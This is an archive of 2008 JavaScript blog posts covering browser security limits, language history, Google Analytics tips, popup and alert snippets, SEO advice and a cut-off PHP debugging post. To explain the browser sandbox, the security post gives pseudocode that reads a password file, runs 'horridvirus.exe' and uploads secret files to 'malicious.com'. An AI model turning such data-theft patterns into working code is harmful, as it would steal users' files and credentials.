Posts Tagged ‘Javascript’

JavaScript Security

Wednesday, July 16th, 2008

Client–side JavaScript has expressly been developed for use in a web browser in conjunction with HTML pages. This has certain consequences for security.

First of all, please note carefully what happens when a user visits a JavaScript–enhanced web site:
The user asks for a certain HTML page without knowing whether it contains JavaScript. The HTML page is delivered to the browser, including the scripts. The scripts usually run automatically when the page loads or when the user takes a certain action. In general the user can’t do anything to stop the scripts (well, he could turn off JavaScript, but few end users know how to do this, or that it can be done, or that JavaScript exists).

So basically an innocent end user downloads a random program and allows it to be executed on his machine. Therefore there should be strict rules as to what this program can and cannot do.

1. JavaScript cannot read files from or write them to the file system on the computer. This would be a clear security hazard:

filesystem.read('/my/password/file');
filesystem.write('horridvirus.exe');

2. JavaScript cannot execute any other programs. This would also be unacceptable:

execute('horridvirus.exe');

3. JavaScript cannot establish a connection to any other computer, except to fetch a new HTML page (or, through XMLHttpRequest, to talk to the server the page itself came from) or to send mail. Anything else would create unacceptable hazards:

var security_hazard = connection.open('malicious.com');
security_hazard.upload(filesystem.read('/my/password/file'));
security_hazard.upload(filesystem.read('/ultra_secret/loans.xls'));

Thus JavaScript simply cannot do such dangerous things. Unfortunately Microsoft has seen fit to add some filesystem commands nonetheless, in combination with its ActiveX technology. This means that Explorer on Windows is structurally less safe than any other browser. It has some built–in protection, but hackers regularly find weaknesses. The first JavaScript virus I heard of works in such a way.

So JavaScript only works on things that are in HTML pages or part of the browser. You cannot influence anything that’s not contained by the browser. But even within the browser there are some no–go areas. Basically JavaScript wants to protect the privacy of the user by disallowing some actions and asking permission for others:

1. You cannot read out the history of the browser. Thus a malicious site owner cannot write a script that finds out where you surfed to recently.
You can go back or forward in the browsing history, but you cannot find out which page you'll go to.
2. You cannot do anything in pages that come from another server (this is the same-origin policy: scheme, host and port must all match). So if your frameset contains two pages from two servers, they cannot communicate with each other. Thus a malicious site owner cannot find out which sites you've opened in other browser windows. See the frame busting page for some more information.
3. You cannot set the value of a file upload field (<input type="file">), so a script cannot pick a file off your disk and submit it:

document.forms[0].upload_field.value = '/my/password/file';
document.forms[0].submit();

4. If you try to close a browser window that has not been opened by JavaScript, the user is asked to confirm this action.
However, this rule isn’t implemented in all browsers and is easy to work around in Explorer.
5. If you try to submit a form to a mail address by JavaScript, the user is asked to confirm this action.
6. You should not be able to open a new window smaller than 100×100 pixels and/or to position it outside the screen area of the computer. Thus a malicious site owner cannot spawn an invisible window.
Note that Explorer on Windows (and maybe other browsers, too) does allow this, contrary to safety regulations.

Thus JavaScript is a scripting language for influencing HTML elements, like forms, images, layers, paragraphs and such, and for influencing a few non–HTML objects like the browser window. Nothing more, but (most importantly) nothing less.
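Rule 2 above is what browsers call the same-origin policy. The following is an added example, not part of the original post: it implements the origin comparison in plain JavaScript and runs stand-alone under Node.js using the standard URL class. The frameset URLs are a constructed sample, and the default-port table is an assumption for the schemes listed.

```javascript
// Added example, not part of the original post: the origin comparison that
// browsers perform before one document may touch another (rule 2 above).
// Runs stand-alone under Node.js; the WHATWG URL class does the parsing.

// Ports that are implied when a URL omits one. URL.port is "" in that case,
// so http://example.com and http://example.com:80 must compare as equal.
const DEFAULT_PORTS = { 'http:': '80', 'https:': '443', 'ws:': '80', 'wss:': '443', 'ftp:': '21' };

// Return the (scheme, host, port) tuple that defines a document's origin,
// or null for schemes such as file:, data: and about:, whose origin is
// "opaque": such a document matches nothing, not even a copy of itself.
function originOf(urlString) {
  const u = new URL(urlString);                 // throws on an unparsable URL
  if (!(u.protocol in DEFAULT_PORTS)) return null;
  return {
    scheme: u.protocol,
    host: u.hostname,                           // already lower-cased by the parser
    port: u.port || DEFAULT_PORTS[u.protocol],
  };
}

// Two documents share an origin only when all three parts match; path,
// query and fragment play no role.
function sameOrigin(urlA, urlB) {
  const a = originOf(urlA), b = originOf(urlB);
  if (a === null || b === null) return false;
  return a.scheme === b.scheme && a.host === b.host && a.port === b.port;
}

// For a frameset, list which pairs of frames may script each other.
function crossFrameAccessTable(frameUrls) {
  const table = [];
  for (let i = 0; i < frameUrls.length; i++) {
    for (let j = i + 1; j < frameUrls.length; j++) {
      table.push({ from: frameUrls[i], to: frameUrls[j], allowed: sameOrigin(frameUrls[i], frameUrls[j]) });
    }
  }
  return table;
}

// Constructed sample frameset; example.com is a reserved documentation name.
const SAMPLE_FRAMES = [
  'http://example.com/page.html',
  'http://example.com:80/other.html#top',   // same origin: default port, path and fragment differ
  'https://example.com/page.html',          // scheme differs
  'http://www.example.com/page.html',       // host differs (a subdomain is another host)
  'http://example.com:8080/page.html',      // port differs
];

for (const row of crossFrameAccessTable(SAMPLE_FRAMES)) {
  console.log((row.allowed ? 'ALLOW ' : 'BLOCK ') + row.from + ' -> ' + row.to);
}
```

In a real browser `new URL(s).origin` gives the same verdict in serialized form ("null" for the opaque cases). Two things relax the rule and are worth knowing when reviewing a page: the legacy `document.domain` setter, which lets subdomains of one site opt in to each other, and `postMessage`, which is the sanctioned channel for frames of different origins to exchange data.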

The JavaScript language

Wednesday, July 16th, 2008

JavaScript is not a programming language in the strict sense. Instead, it is a scripting language because it uses the browser to do the dirty work. If you command an image to be replaced by another one, JavaScript tells the browser to go do it. Because the browser actually does the work, you only need to pull some strings by writing some relatively easy lines of code. That's what makes JavaScript an easy language to start with.

But don't be fooled by some beginner's luck: JavaScript can be pretty difficult, too. First of all, despite its simple appearance it is a full-fledged programming language: it is possible to write quite complex programs in JavaScript. This is rarely necessary when dealing with web pages, but it is possible. This means that there are some complex programming structures that you'll only understand after protracted studies.

Secondly, and more importantly, there are the browser differences. Though modern web browsers all support JavaScript, there is no sacred law that says they should support exactly the same JavaScript. A large part of this site is devoted to exploring and explaining these browser differences and finding ways to cope with them.

So basic JavaScript is easy to learn, but when you start writing advanced scripts browser differences (and occasionally syntactic problems) will creep up.

JavaScript vs Java

Wednesday, July 16th, 2008

Although the names are much alike, JavaScript is primarily a scripting language for use within HTML pages, while Java is a real programming language that does quite different things from JavaScript. In addition Java is much harder to learn. It was developed by Sun for use in pretty much anything that needs some computing power.

JavaScript was developed by Brendan Eich, then working at Netscape, as a client side scripting language (even though there’s no fundamental reason why it can’t be used in a server side environment).

Originally the language was called LiveScript, but when it was about to be released Java had become immensely popular (and slightly hyped). At the last possible moment Netscape changed the name of its scripting language to "JavaScript". This was done purely for marketing reasons. Worse, Eich was ordered to "make it look like Java". This has given rise to the idea that JavaScript is a "dumbed-down" version of Java. Unfortunately there's not the slightest shred of truth in this story.

Java and JavaScript both descend from C and C++, but the languages (or rather, their ancestors) have gone in quite different directions. You can see them as distantly related cousins. Both are object oriented (though this is less important in JavaScript than in many other languages) and they share some syntax, but the differences are more important than the similarities.

If you are a C++ or Java programmer you will be surprised by some of JavaScript’s features. Since I don’t have any previous programming experience, the differences are not described on this site. The best you can do is buy David Flanagan, “JavaScript, the Definitive Guide”, 5th edition, O’Reilly, 2006. In this book the differences between C++/Java and JavaScript are clearly explained. I co–edited a few chapters of this book.

General introduction: JavaScript

Wednesday, July 16th, 2008

JavaScript is most commonly used as a client side scripting language. This means that JavaScript code is written into an HTML page. When a user requests an HTML page with JavaScript in it, the script is sent to the browser and it’s up to the browser to do something with it.

The fact that the script is in the HTML page means that your scripts can be seen, copied and modified by whoever views your page, so never rely on client-side JavaScript to keep a secret or to enforce a restriction; any check that matters must be repeated on the server. Nonetheless, to my mind this openness is a great advantage, because the flip side is that you can view, study and use any JavaScript you encounter on the WWW.

JavaScript can be used in other contexts than a Web browser. Netscape created server-side JavaScript as a CGI-language that can do roughly the same as Perl or ASP. There is no reason why JavaScript couldn’t be used to write real, complex programs. However, this site exclusively deals with the use of JavaScript in web browsers.

If you don’t have any programming experience at all it’s best to start with some gentle JavaScript examples that teach you the basics. It might be a good idea to buy Negrino & Smith, “JavaScript for the World Wide Web”, 4th edition, Peachpit Press, 2001. It contains some very useful examples and though it doesn’t treat advanced programming tricks, it will certainly help you get started. Of course this site also offers plenty of help.

I can also recommend Jeremy Keith, DOM Scripting: Web Design with JavaScript and the Document Object Model, 1st edition, Friends of Ed, 2005. This, too, is a book that doesn’t delve too deeply into technology, but gives non-programmers such as graphic designers/CSS wizards an excellent overview of the most common uses of JavaScript - as well as the most common problems.

Five Lesser Known Google Analytics Features

Tuesday, July 15th, 2008

Google Analytics is a great program that can do a lot more than most people realize. Here are a few features that you may not know about:

* Capture internal search stats. This is a newer feature of Google Analytics and a very nice one. Not only can you see what a visitor put into your internal search box, but what page they were on when they made the search and what page they chose in the search results. Any internal search will work as long as it passes the search variable through the URL. Here’s a short video interview with Google’s Brett Crosby on some of those features.

* Filter out domains. Let’s say your Google Analytics code somehow got on another site and your stats were getting tainted with irrelevant data. No problem. You can create a filter to not count anyone from specific domains you add in. Oddly enough, you can also filter out your own domain so your stats flat line. Not a good idea to do that though.

* Track document downloads or specific links. Adding a small piece of JavaScript to any link will tell Google to track when someone clicks on that link. This works for PDFs, Word documents, email addresses and external links. It also works if you want to see which of two links on the same page is generating more clicks. Even though they go to the same URL, you can tag one link as 'link one' and the other as 'link two' and Google will track the clicks separately for you. Bonus Tip: If you have a WordPress blog, you can instantly tag all links across your blog with the Ultimate Google Analytics plugin.

* Export to Excel. For any newbies, this is a time saving feature. Just about any report can have the data exported to a CSV file which Excel can open. You can now stop copying and pasting most data out of Google Analytics and into Excel and save yourself some time.

* Filter yourself out. This feature is a must do for any company. Find your static IP address and then set up a filter so Google knows not to include traffic from your company network. This ensures that your stats are not inflated by your employees' surfing habits. This also is something you should consider for any partner companies. If you have a web development or SEO company that is constantly checking out the site, filter them out too.

Display an Alert Message on Web Page Load

Monday, July 14th, 2008

If you would like an alert box to display when your page loads, place the following code within the HTML of your web page between your <HEAD> and </HEAD> tags.

<script type="text/javascript">
<!--
alert("Alert Message");
//-->
</script>

Change the string "Alert Message" to the message you would like to display.

Although you can use the above HTML code to display an alert box when your web page loads, please use it cautiously, as you don’t want to irritate your visitors.

Using Scripts to Spice up Your Web Page

Monday, July 14th, 2008

You can use scripts within your pages to spice them up. However, although you will probably be tempted to use all the fancy techniques to create special effects, try not to go overboard. With each script or effect you add to your web page, it will take that much longer for your page to load.

Select your scripts carefully. Most browsers now support JavaScript, so using this type of script will probably be your best choice. Keep in mind, JavaScript and Java are two totally different languages and are not in any way connected.

If you must use Java on your site, use it sparingly. Java can be slow and has a tendency to crash browsers. It can also add a lot of time to your web page’s load time.

Scripts to Avoid When Designing a Professional Site

Pop up boxes asking for your visitor’s name

Disabling the browsers back button

Continuous alert messages

Scrolling messages in the status bar

Large scrolling text

Fancy cursors

Cursor trailers

Automatic transfers on mouseovers

Mouseover sounds

This list represents only a small portion of the types of scripts you should avoid. These scripts are not only very irritating, but they're a big waste of your visitors' time. If you want your visitors to return, use scripts that complement your web site.

Creating a First Visit Web Page Pop Up Window

Monday, July 14th, 2008

It’s a proven fact that the use of popup windows is an effective marketing technique that produces great results. However, they can be very irritating to your visitors. How can you use this powerful marketing technique without offending your visitors? Compromise and use a popup window that only displays the first time your visitor enters your site.

Place the following code within the <BODY> of your web page.

<script type="text/javascript">
<!--
// Returns "here" if a cookie called `name` is present, otherwise null.
// The loop walks document.cookie one "name=value; " entry at a time.
function GetCookie(name) {
  var arg = name + "=";
  var alen = arg.length;
  var clen = document.cookie.length;
  var i = 0;
  while (i < clen) {
    var j = i + alen;
    if (document.cookie.substring(i, j) == arg)
      return "here";
    i = document.cookie.indexOf(" ", i) + 1;   // skip to the next cookie
    if (i == 0) break;                          // no more separators: done
  }
  return null;
}

var visit = GetCookie("COOKIE1");
if (visit == null) {                            // first visit: no cookie yet
  var expire = new Date();
  window.name = "thiswin";
  // The window features string must stay on one line; a line break
  // inside the quotes is a syntax error.
  var newwin = open("yourpage.htm", "dispwin",
                    "width=450,height=455,scrollbars=yes,menubar=no");
  expire = new Date(expire.getTime() + 7776000000); // 90 days in milliseconds
  // expires= needs the RFC date format, so use toUTCString() rather
  // than the Date object's default string form.
  document.cookie = "COOKIE1=here; expires=" + expire.toUTCString();
}
// -->
</script>

Two values in the script need changing:

The “yourpage.htm” text specifies the popup window url.

Change the height and width to your preferred window size.
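The script above does its job, but its cookie check is a loose substring scan and the cookie it sets carries no Path, Secure or SameSite attribute. The following is an added example, not the page's own code: the same first-visit decision written around a proper cookie-string parser and a cookie builder that sets those attributes. The cookie name COOKIE1, the value "here" and the 90-day lifetime are taken from the script above; the popup URL yourpage.htm is a placeholder. The logic works on a cookie string so it runs under Node.js; in a browser it reads document.cookie and assigns the returned string back.

```javascript
// Added example (not the original page's code): first-visit detection done
// with a real cookie parser and with the cookie attributes a reviewer expects.
// The pure functions operate on a cookie string so this runs under Node.js;
// the browser wiring at the bottom only runs when `document` exists.

// Parse "a=1; b=2" into an object. The first occurrence of a name wins,
// which matches how browsers serialise document.cookie.
function parseCookies(cookieString) {
  const jar = {};
  for (const part of (cookieString || '').split(';')) {
    const eq = part.indexOf('=');
    if (eq === -1) continue;                 // malformed entry, ignore it
    const name = part.slice(0, eq).trim();
    const value = part.slice(eq + 1).trim();
    if (name !== '' && !(name in jar)) {
      try { jar[name] = decodeURIComponent(value); } catch (e) { jar[name] = value; }
    }
  }
  return jar;
}

// Build the string to assign to document.cookie. Expires uses the RFC 1123
// form that toUTCString() produces; Secure and SameSite=Lax stop the cookie
// travelling over plain HTTP or riding along on cross-site requests.
function buildCookie(name, value, { days, now = new Date(), path = '/', secure = true, sameSite = 'Lax' } = {}) {
  // RFC 6265 token characters only; anything else would corrupt the header.
  if (!/^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$/.test(name)) throw new Error('invalid cookie name: ' + name);
  const expires = new Date(now.getTime() + days * 24 * 60 * 60 * 1000);
  let cookie = name + '=' + encodeURIComponent(value) +
               '; Expires=' + expires.toUTCString() +
               '; Path=' + path + '; SameSite=' + sameSite;
  if (secure) cookie += '; Secure';
  return cookie;
}

// Same decision as the script above: show the popup only when COOKIE1 is
// absent, and return the cookie that marks the visitor as seen for 90 days.
function decideFirstVisitPopup(cookieString, now = new Date()) {
  const seen = 'COOKIE1' in parseCookies(cookieString);
  return {
    showPopup: !seen,
    setCookie: seen ? null : buildCookie('COOKIE1', 'here', { days: 90, now }),
  };
}

// Browser wiring; skipped under Node.js. yourpage.htm is a placeholder URL.
if (typeof document !== 'undefined' && typeof window !== 'undefined') {
  const decision = decideFirstVisitPopup(document.cookie);
  if (decision.showPopup) {
    document.cookie = decision.setCookie;
    window.open('yourpage.htm', 'dispwin', 'width=450,height=455,scrollbars=yes,menubar=no');
  }
}
```

Note that the Secure attribute means the cookie is only stored and sent on HTTPS pages; drop it only for a site served over plain HTTP. Most browsers also block a `window.open` that is not triggered by a user action, so the popup may never appear even when the cookie logic says it should.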

Search Engine Optimization: Search Engine Tips

Monday, June 30th, 2008

For the purpose of these tips a search engine is something like Google. It scans the web for sites to include in its index. It will follow links and find new sites all on its own. A directory (such as Yahoo or DMOZ) includes sites one at a time, with a human being looking at each site.

You can learn a lot about different types of search engines at Search Engine Watch.

# Put your keyword/key phrase in the title tag of your page. It can be the only thing there, or you can make a complete sentence out of it. The title is also what appears in your bookmarks list. So a good title will help people remember you when they bookmark your site.

# Google doesn’t care what you put in the description tag, but other engines do. Put in a sentence which tells the viewer why the heck they should visit your site. What’s in it for them?

# Google doesn’t care about what’s in your keywords tag, but the other engines might. Put in a few words and phrases appropriate to your page. Include common mis-spellings.

# Your primary keyword/phrase should appear in the headline at the top of your page.

# Skip the graphics and banners. Write a page that’s cool and interesting and is appropriate to your keywords. So if your keyword is cell phones write a cool, informative page about cell phones.

# Skip the Java, JavaScript, heavy graphics, etc.

# Links to your page, either from your other pages or from other sites, should contain your keyword.

# Any graphics should have keywords in the alt attribute. This will help describe the image.

# Links from your page should also contain your keywords.

# Don’t use your keywords too many times on a page. How do you tell? If your page starts to read badly, then you’ve used your keyword too many times. Links to your page count for far more than how many times your keywords appear.

PHP: Debugging PHP

Monday, June 30th, 2008

It really begun at the last Copenhagen php-meetup; Joakim Nygård and Jacob Oettinger made a presentation of their project, WebCacheGrind. I casually mentioned something about having played with the dbgp-protocol (The debugging part of Xdebug) and that it ought to be simple enough to write a fontend for it. That prompted some snickering from the back row. Apparently some guys had this rule at their workingplace, that whomever said that something ought to be easy to do, had to do so himself.Spectator is a XUL application, which should make it cross platform. I have tinkered a bit with XUL before, but not a full application. If you’re wondering what XUL is, it’s the GUI toolkit, in which the frontends for Firefox and Thunderbird are written. It’s a markup language — much like HTML, which can be scripted with Javascript. This makes it very easy to work with. The only problem seems to be a rather …